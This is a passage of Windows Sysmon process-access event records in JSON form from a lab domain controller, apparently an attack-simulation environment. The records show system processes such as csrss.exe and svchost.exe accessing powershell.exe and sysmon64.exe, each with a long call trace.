\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+986a2f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b0485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b62d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b381a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b446db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b442ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2a0f9(wow64)","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 